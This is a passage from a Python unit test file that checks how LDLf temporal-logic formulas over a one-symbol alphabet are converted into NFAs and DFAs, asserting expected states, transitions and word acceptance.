a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_not_a_tt(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_star_not_a_tt = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), tt)
x = self.ldlf_a.to_nfa(eventually_star_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_not_a_tt}), frozenset(), frozenset()),
(frozenset({eventually_star_not_a_tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([eventually_star_not_a_tt])}
initial_state = {frozenset([eventually_star_not_a_tt])}
states = {frozenset(), frozenset([eventually_star_not_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000018_alphabet_a_eventually_star_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000018_alphabet_a_eventually_star_not_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_not_a_ff(self):
"""<a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
eventually_star_a_not_ff = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), ff)
x = self.ldlf_a.to_nfa(eventually_star_a_not_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_a_not_ff}), frozenset(), frozenset({eventually_star_a_not_ff})),
}
final_states = {frozenset()}
initial_state = {frozenset([eventually_star_a_not_ff])}
states = {frozenset(), frozenset([eventually_star_a_not_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000019_alphabet_a_eventually_star_not_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000019_alphabet_a_eventually_star_not_a_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_not_a_a(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_star_not_a_a = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), atomic_a)
expanded_eventually_star_not_a_a = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), PathExpressionEventually(atomic_a, tt))
x = self.ldlf_a.to_nfa(eventually_star_not_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({expanded_eventually_star_not_a_a}), frozenset(), frozenset({expanded_eventually_star_not_a_a})),
(frozenset({expanded_eventually_star_not_a_a}), frozenset({a}), frozenset({tt})),
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_not_a_a])}
states = {frozenset(), frozenset([expanded_eventually_star_not_a_a]), frozenset({tt})}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000020_alphabet_a_eventually_star_not_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000020_alphabet_a_eventually_star_not_a_a.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_]))
self.assertTrue(dfa.word_acceptance([not_, not_, not_, a_]))
def test_to_nfa_alphabet_a_eventually_star_sequence_not_a_true_a(self):
"""<not-a;T*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
seq = PathExpressionSequence(Not(atomic_a), TrueFormula())
star = PathExpressionStar(seq)
eventually_star_sequence_not_a_true_a = PathExpressionEventually(star, atomic_a)
expanded_eventually_star_sequence_not_a_true_a = PathExpressionEventually(star, PathExpressionEventually(atomic_a, tt))
eventually_true_eventually_star_sequence_not_a_true_a = PathExpressionEventually(TrueFormula(), expanded_eventually_star_sequence_not_a_true_a)
x = self.ldlf_a.to_nfa(eventually_star_sequence_not_a_true_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_true_eventually_star_sequence_not_a_true_a}), frozenset(), frozenset({expanded_eventually_star_sequence_not_a_true_a})),
(frozenset({eventually_true_eventually_star_sequence_not_a_true_a}), frozenset({a}), frozenset({expanded_eventually_star_sequence_not_a_true_a})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({expanded_eventually_star_sequence_not_a_true_a}), frozenset(), frozenset({eventually_true_eventually_star_sequence_not_a_true_a})),
(frozenset({expanded_eventually_star_sequence_not_a_true_a}), frozenset({a}),frozenset({tt}))
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_sequence_not_a_true_a])}
states = {frozenset(),
frozenset({eventually_true_eventually_star_sequence_not_a_true_a}),
frozenset({tt}),
frozenset({expanded_eventually_star_sequence_not_a_true_a})
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000021_alphabet_a_eventually_star_sequence_not_a_true_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000021_alphabet_a_eventually_star_sequence_not_a_true_a.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue (dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertTrue (dfa.word_acceptance([a_, not_]))
self.assertTrue (dfa.word_acceptance([a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_]))
self.assertTrue (dfa.word_acceptance([not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_]))
self.assertTrue (dfa.word_acceptance([not_, a_, a_]))
self.assertTrue (dfa.word_acceptance([a_, not_, not_]))
self.assertTrue (dfa.word_acceptance([a_, not_, a_]))
self.assertTrue (dfa.word_acceptance([a_, a_, not_]))
self.assertTrue (dfa.word_acceptance([a_, a_, a_]))
self.assertTrue (dfa.word_acceptance([not_, a_, a_]))
self.assertTrue (dfa.word_acceptance([a_, not_, not_]))
self.assertTrue (dfa.word_acceptance([a_, not_, a_]))
self.assertTrue (dfa.word_acceptance([a_, a_, not_]))
self.assertTrue (dfa.word_acceptance([a_, a_, a_]))
self.assertFalse(dfa.word_acceptance([ not_, not_, not_, not_ ]))
self.assertFalse(dfa.word_acceptance([ not_, not_, not_, a_ ]))
self.assertTrue (dfa.word_acceptance([ not_, not_, a_, not_ ]))
self.assertTrue (dfa.word_acceptance([ not_, not_, a_, a_ ]))
self.assertFalse(dfa.word_acceptance([ not_, a_, not_, not_ ]))
self.assertFalse(dfa.word_acceptance([ not_, a_, not_, a_ ]))
self.assertTrue (dfa.word_acceptance([ not_, a_, a_, not_ ]))
self.assertTrue (dfa.word_acceptance([ not_, a_, a_, a_ ]))
self.assertTrue (dfa.word_acceptance([ a_, not_, not_, not_ ]))
self.assertTrue (dfa.word_acceptance([ a_, not_, not_, a_ ]))
self.assertTrue (dfa.word_acceptance([ a_, not_, a_, not_ ]))
self.assertTrue (dfa.word_acceptance([ a_, not_, a_, a_ ]))
self.assertTrue (dfa.word_acceptance([ a_, a_, not_, not_ ]))
self.assertTrue (dfa.word_acceptance([ a_, a_, not_, a_ ]))
self.assertTrue (dfa.word_acceptance([ a_, a_, a_, not_ ]))
self.assertTrue (dfa.word_acceptance([ a_, a_, a_, a_ ]))
self.assertTrue(dfa.word_acceptance([not_, a_, not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, a_, not_]))
def test_to_nfa_alphabet_a_eventually_star_sequence_not_a_a_a(self):
"""<not-a;a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
seq = PathExpressionSequence(Not(atomic_a), atomic_a)
star = PathExpressionStar(seq)
eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, atomic_a)
expanded_eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, PathExpressionEventually(atomic_a, tt))
eventually_a_eventually_star_sequence_not_a_a_a = PathExpressionEventually(atomic_a, expanded_eventually_star_sequence_not_a_a_a)
x = self.ldlf_a.to_nfa(eventually_star_sequence_not_a_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_a_eventually_star_sequence_not_a_a_a}), frozenset({a}), frozenset({expanded_eventually_star_sequence_not_a_a_a})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset(), frozenset({eventually_a_eventually_star_sequence_not_a_a_a})),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset({a}),frozenset({tt}))
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_sequence_not_a_a_a])}
states = {frozenset(),
frozenset({eventually_a_eventually_star_sequence_not_a_a_a}),
frozenset({tt}),
frozenset({expanded_eventually_star_sequence_not_a_a_a})
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000022_alphabet_a_eventually_star_sequence_not_a_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000022_alphabet_a_eventually_star_sequence_not_a_a_a.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_, a_]))
def test_to_nfa_alphabet_a_eventually_star_sequence_a_not_a_a(self):
"""<a;not-a*>a"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
seq = PathExpressionSequence(atomic_a, Not(atomic_a))
star = PathExpressionStar(seq)
eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, atomic_a)
expanded_eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, PathExpressionEventually(atomic_a, tt))
eventually_not_a_eventually_star_sequence_not_a_a_a = PathExpressionEventually(Not(atomic_a), expanded_eventually_star_sequence_not_a_a_a)
x = self.ldlf_a.to_nfa(eventually_star_sequence_not_a_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_not_a_eventually_star_sequence_not_a_a_a}), frozenset(), frozenset({expanded_eventually_star_sequence_not_a_a_a})),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset({a}), frozenset({eventually_not_a_eventually_star_sequence_not_a_a_a})),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset({a}),frozenset({tt}))
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_sequence_not_a_a_a])}
states = {frozenset(),
frozenset({eventually_not_a_eventually_star_sequence_not_a_a_a}),
frozenset({tt}),
frozenset({expanded_eventually_star_sequence_not_a_a_a})
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000023_alphabet_a_eventually_star_sequence_not_a_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000023_alphabet_a_eventually_star_sequence_not_a_a_a.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_always_a_ff(self):
"""[a]ff"""
a = self.a_sym
ff = LogicalFalse()
always_a_ff = PathExpressionAlways(AtomicFormula(a), ff)
x = self.ldlf_a.to_nfa(always_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([always_a_ff]), frozenset({a}), frozenset({ff})),
(frozenset([always_a_ff]), frozenset(), frozenset()),
}
final_states = {frozenset(), frozenset([always_a_ff])}
initial_state = {frozenset([always_a_ff])}
states = {frozenset([always_a_ff]), frozenset([ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000024_alphabet_a_always_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000024_alphabet_a_always_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_propositional_false(self):
a = self.a_sym
tt = LogicalTrue()
always_false_tt = PathExpressionAlways(FalseFormula(), tt)
pl = PL(self.ldlf_a.alphabet)
expanded_false = pl.expand_formula(FalseFormula())
expanded_always_false_tt = PathExpressionAlways(expanded_false, tt)
x = self.ldlf_a.to_nfa(always_false_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([expanded_always_false_tt]), frozenset(), frozenset()),
(frozenset([expanded_always_false_tt]), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([expanded_always_false_tt])}
initial_state = {frozenset([expanded_always_false_tt])}
states = {frozenset([expanded_always_false_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000025_alphabet_a_always_false_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000025_alphabet_a_always_false_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_propositional_true(self):
a = self.a_sym
tt = LogicalTrue()
always_true_tt = PathExpressionAlways(TrueFormula(), tt)
x = self.ldlf_a.to_nfa(always_true_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_true_tt}), frozenset(), frozenset({tt})),
(frozenset({always_true_tt}), frozenset({a}), frozenset({tt})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt]), frozenset([always_true_tt])}
initial_state = {frozenset([always_true_tt])}
states = {frozenset(), frozenset([always_true_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000026_alphabet_a_always_true_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000026_alphabet_a_always_true_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_propositional_not_a(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_not_a_tt = PathExpressionAlways(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(always_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({always_not_a_tt}), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt]), frozenset({always_not_a_tt})}
initial_state = {frozenset([always_not_a_tt])}
states = {frozenset(), frozenset([always_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000027_alphabet_a_always_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000027_alphabet_a_always_not_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_a_tt = PathExpressionAlways(atomic_a, tt)
x = self.ldlf_a.to_nfa(always_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({always_a_tt}), frozenset({a}), frozenset({tt})),
(frozenset({always_a_tt}), frozenset(), frozenset()),
}
final_states = {frozenset(), frozenset([tt]), frozenset({always_a_tt})}
initial_state = {frozenset([always_a_tt])}
states = {frozenset(), frozenset([always_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000028_alphabet_a_always_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000028_alphabet_a_always_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_test_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_test_a_tt = PathExpressionAlways(PathExpressionTest(atomic_a), tt)
expanded_always_test_a_tt = PathExpressionAlways(PathExpressionTest(PathExpressionEventually(atomic_a, tt)), tt)
x = self.ldlf_a.to_nfa(always_test_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({expanded_always_test_a_tt}), frozenset({a}), frozenset()),
(frozenset({expanded_always_test_a_tt}), frozenset(), frozenset())
}
final_states = {frozenset(), frozenset([expanded_always_test_a_tt])}
initial_state = {frozenset([expanded_always_test_a_tt])}
states = {frozenset(), frozenset([expanded_always_test_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000029_alphabet_a_always_test_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000029_alphabet_a_always_test_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_test_a_ff(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
ff = LogicalFalse()
always_test_a_ff = PathExpressionAlways(PathExpressionTest(atomic_a), ff)
expanded_always_test_a_ff = PathExpressionAlways(PathExpressionTest(PathExpressionEventually(atomic_a, tt)), ff)
x = self.ldlf_a.to_nfa(always_test_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({expanded_always_test_a_ff}), frozenset(), frozenset()),
(frozenset({expanded_always_test_a_ff}), frozenset({a}), frozenset({ff})),
}
final_states = {frozenset(), frozenset({expanded_always_test_a_ff})}
initial_state = {frozenset([expanded_always_test_a_ff])}
states = {frozenset(), frozenset([expanded_always_test_a_ff]), frozenset([ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000030_alphabet_a_always_test_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000030_alphabet_a_always_test_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_sequence_a_not_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_sequence_a_not_a_tt = PathExpressionAlways(PathExpressionSequence(atomic_a, Not(atomic_a)), tt)
always_not_a_tt = PathExpressionAlways(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(always_sequence_a_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({always_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({always_not_a_tt}), frozenset({a}), frozenset({})),
(frozenset({always_sequence_a_not_a_tt}), frozenset({a}), frozenset({always_not_a_tt})),
(frozenset({always_sequence_a_not_a_tt}), frozenset({}), frozenset({})),
}
final_states = {frozenset(), frozenset([tt]), frozenset([always_sequence_a_not_a_tt]), frozenset([always_not_a_tt])}
initial_state = {frozenset([always_sequence_a_not_a_tt])}
states = {frozenset(), frozenset([always_sequence_a_not_a_tt]), frozenset([always_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000031_alphabet_a_always_sequence_a_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000031_alphabet_a_always_sequence_a_not_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_star_a_tt = PathExpressionAlways(PathExpressionStar(atomic_a), tt)
x = self.ldlf_a.to_nfa(always_star_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_star_a_tt}), frozenset(), frozenset()),
(frozenset({always_star_a_tt}), frozenset({a}), frozenset({always_star_a_tt})),
}
final_states = {frozenset(), frozenset([always_star_a_tt])}
initial_state = {frozenset([always_star_a_tt])}
states = {frozenset(), frozenset([always_star_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000032_alphabet_a_always_star_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000032_alphabet_a_always_star_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_a_ff(self):
"""[a*]ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
always_star_a_ff = PathExpressionAlways(PathExpressionStar(atomic_a), ff)
x = self.ldlf_a.to_nfa(always_star_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([always_star_a_ff])}
states = {frozenset(), frozenset([always_star_a_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000033_alphabet_a_always_star_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000033_alphabet_a_always_star_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_tt(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_star_not_a_tt = PathExpressionAlways(PathExpressionStar(Not(atomic_a)), tt)
x = self.ldlf_a.to_nfa(always_star_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_star_not_a_tt}), frozenset({a}), frozenset()),
(frozenset({always_star_not_a_tt}), frozenset({}), frozenset({always_star_not_a_tt})),
}
final_states = {frozenset(), frozenset([always_star_not_a_tt])}
initial_state = {frozenset([always_star_not_a_tt])}
states = {frozenset(), frozenset([always_star_not_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000034_alphabet_a_always_star_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000034_alphabet_a_always_star_not_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_not_a_ff(self):
"""<a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
